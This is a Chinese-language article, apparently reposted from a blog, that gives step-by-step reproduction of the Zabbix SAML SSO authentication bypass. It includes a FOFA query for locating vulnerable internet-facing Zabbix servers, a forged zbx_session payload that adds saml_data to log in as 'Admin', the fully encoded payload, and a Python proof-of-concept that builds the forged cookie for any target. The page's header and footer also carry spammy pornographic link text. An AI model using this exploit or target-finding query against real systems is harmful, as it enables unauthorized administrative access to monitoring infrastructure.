国产片侵犯亲女视频播放_亚洲精品二区_在线免费国产视频_欧美精品一区二区三区在线_少妇久久久_在线观看av不卡

服務(wù)器之家:專(zhuān)注于服務(wù)器技術(shù)及軟件下載分享
分類(lèi)導(dǎo)航

云服務(wù)器|WEB服務(wù)器|FTP服務(wù)器|郵件服務(wù)器|虛擬主機(jī)|服務(wù)器安全|DNS服務(wù)器|服務(wù)器知識(shí)|Nginx|IIS|Tomcat|

服務(wù)器之家 - 服務(wù)器技術(shù) - 服務(wù)器知識(shí) - Zabbix SAML SSO 登錄繞過(guò)漏洞的操作流程

Zabbix SAML SSO 登錄繞過(guò)漏洞的操作流程

2022-03-02 21:51Adminxe 服務(wù)器知識(shí)

這篇文章主要介紹了Zabbix SAML SSO 登錄繞過(guò)漏洞的操作方法,該漏洞源于在啟用 saml SSO 身份驗(yàn)證(非默認(rèn))的情況下,未身份驗(yàn)證的攻擊者可以修改會(huì)話(huà)數(shù)據(jù),成功繞過(guò)前臺(tái)進(jìn)入后臺(tái),因?yàn)榇鎯?chǔ)在會(huì)話(huà)中的用戶(hù)登錄未經(jīng)過(guò)驗(yàn)證,具體

 

一、簡(jiǎn)介

zabbix是一個(gè)基于WEB界面的提供分布式系統(tǒng)監(jiān)視以及網(wǎng)絡(luò)監(jiān)視功能的企業(yè)級(jí)的開(kāi)源解決方案。zabbix能監(jiān)視各種網(wǎng)絡(luò)參數(shù),保證服務(wù)器系統(tǒng)的安全運(yùn)營(yíng);并提供靈活的通知機(jī)制以讓系統(tǒng)管理員快速定位/解決存在的各種問(wèn)題。

zabbix server可以通過(guò)SNMP,zabbix agent,ping,端口監(jiān)視等方法提供對(duì)遠(yuǎn)程服務(wù)器/網(wǎng)絡(luò)狀態(tài)的監(jiān)視,數(shù)據(jù)收集等功能,它可以運(yùn)行在Linux,Solaris,HP-UX,AIX,F(xiàn)ree BSD,Open BSD,OS X等平臺(tái)上。

該漏洞源于在啟用 saml SSO 身份驗(yàn)證(非默認(rèn))的情況下,未身份驗(yàn)證的攻擊者可以修改會(huì)話(huà)數(shù)據(jù),成功繞過(guò)前臺(tái)進(jìn)入后臺(tái),因?yàn)榇鎯?chǔ)在會(huì)話(huà)中的用戶(hù)登錄未經(jīng)過(guò)驗(yàn)證。

漏洞的限制條件:需要啟用 SAML 身份驗(yàn)證,并且攻擊者必須知道 Zabbix 用戶(hù)的用戶(hù)名。

 

二、FOFA語(yǔ)法

app=“ZABBIX-監(jiān)控系統(tǒng)” && body=“SAML”

 

三、復(fù)現(xiàn)流程

1、通過(guò)fofa語(yǔ)法搜索zabbix資產(chǎn)訪(fǎng)問(wèn)首頁(yè)獲取set-cookie中zbx_session參數(shù)的值

Zabbix SAML SSO 登錄繞過(guò)漏洞的操作流程

2、通過(guò)Url解碼和Base64解碼獲得zbx_session參數(shù)Json格式數(shù)據(jù)

Zabbix SAML SSO 登錄繞過(guò)漏洞的操作流程

{"sessionid":"67f71355eb96121f384ea0571290faca","sign":"Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg/OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

3、通過(guò)在Json中添加saml_data和username_attribute參數(shù)后重新Base64編碼和Url編碼構(gòu)造Payload

{"saml_data":{"username_attribute":"Admin"},"sessionid":"67f71355eb96121f384ea0571290faca","sign":"Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg/OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

4、把構(gòu)造好的payload進(jìn)行base64編碼和url編碼

Zabbix SAML SSO 登錄繞過(guò)漏洞的操作流程

%65%79%4a%7a%59%57%31%73%58%32%52%68%64%47%45%69%4f%6e%73%69%64%58%4e%6c%63%6d%35%68%62%57%56%66%59%58%52%30%63%6d%6c%69%64%58%52%6c%49%6a%6f%69%51%57%52%74%61%57%34%69%66%53%77%69%63%32%56%7a%63%32%6c%76%62%6d%6c%6b%49%6a%6f%69%4e%6a%64%6d%4e%7a%45%7a%4e%54%56%6c%59%6a%6b%32%4d%54%49%78%5a%6a%4d%34%4e%47%56%68%4d%44%55%33%4d%54%49%35%4d%47%5a%68%59%32%45%69%4c%43%4a%7a%61%57%64%75%49%6a%6f%69%56%58%6c%78%4d%6b%4a%59%55%57%5a%6c%4e%55%6c%31%5a%7a%52%56%51%6e%42%31%59%33%64%78%4d%31%42%59%51%57%31%57%61%44%42%6a%64%48%42%53%4e%48%42%32%52%57%5a%36%5a%31%77%76%54%31%64%6c%4e%31%52%4c%61%47%31%42%55%57%52%78%65%58%55%31%61%56%56%74%64%46%64%36%55%56%49%72%4d%47%30%7a%4d%32%56%52%51%6b%68%75%61%7a%46%57%56%69%74%4a%54%7a%42%70%59%30%46%52%50%54%30%69%66%51%3d%3d

5、請(qǐng)求index_sso.php,在http請(qǐng)求頭中構(gòu)造payload,將zbx_session的值替換為url編碼后的payload

Zabbix SAML SSO 登錄繞過(guò)漏洞的操作流程

Zabbix SAML SSO 登錄繞過(guò)漏洞的操作流程

6、成功登錄后臺(tái)

Zabbix SAML SSO 登錄繞過(guò)漏洞的操作流程

可利用poc直接獲取構(gòu)造后的payload

Zabbix SAML SSO 登錄繞過(guò)漏洞的操作流程

poc:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import requests
import re
import urllib.parse
import base64
import json
import sys
 
def exp(target, username):
    resp = requests.get(url=target, verify=False)
    cookie = resp.headers.get("Set-Cookie")
    zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)
    url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8')
    base64_decode_data = base64.b64decode(url_decode_data)
    decode_to_str = str(base64_decode_data, encoding='utf-8')
    to_json = json.loads(decode_to_str)
    tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])
    payloadJson = json.dumps(tmp_ojb)
    print("decode_payload:", payloadJson)
    payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))
    print("zbx_signed_session:", payload)
if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("argv error")
        exit(0)
    target = sys.argv[1]
    username = sys.argv[2]
    exp(target, username)

到此這篇關(guān)于Zabbix SAML SSO 登錄繞過(guò)漏洞的文章就介紹到這了,更多相關(guān)Zabbix 登錄繞過(guò)漏洞內(nèi)容請(qǐng)搜索服務(wù)器之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持服務(wù)器之家!

原文地址:https://blog.csdn.net/Adminxe/article/details/123227862

延伸 · 閱讀

精彩推薦
主站蜘蛛池模板: 色综合欧美 | 国产精品一区二区在线观看 | 一区二区精品视频 | 色噜噜狠狠一区二区三区狼国成人 | 天天爽天天干 | 男人的天堂视频网站 | 亚洲第一视频网站 | 91视频免费观看 | 亚洲国产精品99久久久久久久久 | 欧美久久久久久久久久久 | 欧美一区视频 | 最好看的2019年中文在线观看 | 91精品国产一区二区三区四区在线 | 日韩在线免费电影 | 免费黄色大片 | 欧美激情综合五月色丁香小说 | 亚洲精品一区二三区不卡 | 日韩欧美在线综合 | 亚洲电影在线播放 | 在线日本视频 | 一区二区三区视频 | 91精品国产手机 | 超碰九七在线 | 亚洲精品久久久久久久久久久久久 | 亚洲一一在线 | 看av片 | 日韩精品久久久 | 欧美精品一二三 | 狠狠的日| 国产精品69久久久久水密桃 | 国产精品1区2区3区 久久免费一区 | 亚洲精品久久久久久下一站 | 亚洲精品视频网 | 欧美亚洲精品在线 | 欧美一级黄色片免费看 | 三级视频在线观看 | 日韩国产精品一区二区 | 亚洲一区中文字幕 | 国产一级在线 | 综合色区 | av在线播放网 |